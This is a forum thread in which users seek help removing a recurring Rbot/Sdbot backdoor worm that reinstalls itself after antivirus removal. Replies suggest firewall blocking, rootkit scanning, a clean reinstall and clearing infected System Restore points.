I've recently been infected by a rather persistent virus which I have come to believe is the "W32/Rbot-AA" worm. AVG identifies it as "IRC/Backdoor.Sdbot.27.AD" in the file "scrgrd.exe" in the %system% folder. AVG removes the file successfully, but about every 30 minutes or so, something happens...

As I watch the task manager, two processes launch spontaneously, "tftp.exe" and then "cmd.exe". I can end neither of these processes (error message denies me access). In a few short seconds the processes terminate, and AVG notifies me that "scrgrd.exe" has been detected in the %system% folder again.

I'm very perplexed by this situation. I have followed the removal instructions for the worm in the Sophos article for W32/Rbot-AA but have found none of the registry entries they reference. In the meantime, I have edited the permissions for "tftp.exe" to deny access to it by all but the SYSTEM.

Any thoughts/suggestions? Do you think I've discovered a new variant?

i think the problem is in your router/firewall. its ineffective.

On the contrary, we're behind a corporate firewall here, as well as NAT.

The bot is bypassing your firewall using known methods, so your right...but your permitting its traffic nonetheless.

You can stop this quickly at the firewall, and certainly recommended PRIOR to fixing the infection. Sounds like perhaps a rootkit is in place on the machine.

Good luck,

J.
j e r u v y a t y a h o o d o t c o m

I have downloaded VICE and scanned for rootkits. It detects 2, one in "%system%\setupapi.exe" and another in "%system%\ipodservice.exe". However, I am unfamiliar with how just exactly to deal with rootkits.

Well what is your goal?

If it's to discover how you got it, then you'll want to look at forensic tools.

If your just want to fix it, then a complete fresh install would be in order.

There are numerous tools available for your needs, I would suggest going to

http://www.securityfocus.com

and checking out there section of tools for forensic analysis.

You may also find some good infomation about how to perform the forensics in accordance with your needs.

HTH,

J.
j e r u v y a t y a h o o d o t c o m

Yeah, I'm having the same problem... my AVG found the same trojan, and I removed it to the Virus Vault...but after restart and rescan, AVG resident shield still says the trojan is there, but in C:\System Volume Information\_restore{541b3878-060b-4a6b-9506-e5c47d137969}\rp108\a0015900.exe
Any ideas of how to get rid of it? AVG scan doesnt find it...can't access System Volume Information folder....an I screwed?

Robyn... your restore point was infected. No AV will going to delete any infected files on that area. You must turn off your restore option from your Windows. Restart your PC, so that the old restote file will be deleted. Scan your PC just in case and then activate again the restore option again, and your problem will be solved.

Regards from Panama

Actually, you can configure your system to not save restore information. This will delete your restore history and will clean System Volume Information.

Ok, thanks.

Hi, I'm having the same problem with that trojan, but can't find no info on the web... It has been foung in the SCRGRD.exe which I have deleted, but it still exists... I found out that the processes wnscpcc.exe and stcn.exe have something to do with it, so I deleted both, but after restart stcn.exe exists again... Also removing the "run" information in the registry doesn't help, because they restore themselfs after restart... Can anyone help me how to get rid of that thing???

Please post your own thread thank you!

J.
j e r u v y a t y a h o o d o t c o m

@Jeruvy: Whatfor? It's the same problem...